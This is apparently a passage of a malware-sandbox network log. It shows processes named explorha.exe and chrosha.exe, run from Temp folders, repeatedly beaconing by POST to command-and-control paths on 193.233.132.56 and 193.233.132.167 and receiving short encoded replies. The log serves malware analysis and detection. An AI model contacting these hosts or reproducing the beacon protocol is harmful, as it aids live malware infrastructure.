                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:21.202567101 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.5 | 49937 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:20.709148884 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:20.961416006 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.5 | 49939 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:21.324980974 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:21.572743893 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.5 | 49940 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:21.558029890 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:21.809206009 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:21.810395956 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:22.064507961 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.5 | 49941 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:21.820354939 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:22.067542076 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.5 | 49942 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:22.420603037 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:22.660533905 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:22.661830902 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:22.910242081 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      110 | 192.168.2.5 | 49943 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:22.427755117 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:22.672481060 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      111 | 192.168.2.5 | 49944 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:22.926250935 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:23.179841995 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      112 | 192.168.2.5 | 49945 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:23.332365990 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:23.573992968 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:23.575232983 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:23.820990086 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      113 | 192.168.2.5 | 49946 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:23.588937998 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:23.837496042 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      114 | 192.168.2.5 | 49947 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:24.092719078 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:24.348177910 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
115 | 192.168.2.5 | 49948 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:24.179438114 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:24.428349972 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:24.429516077 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:24.683850050 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
116 | 192.168.2.5 | 49949 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:24.712636948 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:24.960352898 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.5 | 49951 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:25.032480955 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:25.272588015 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:25.275438070 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:25.520054102 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.5 | 49952 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:25.209204912 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:25.457386017 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


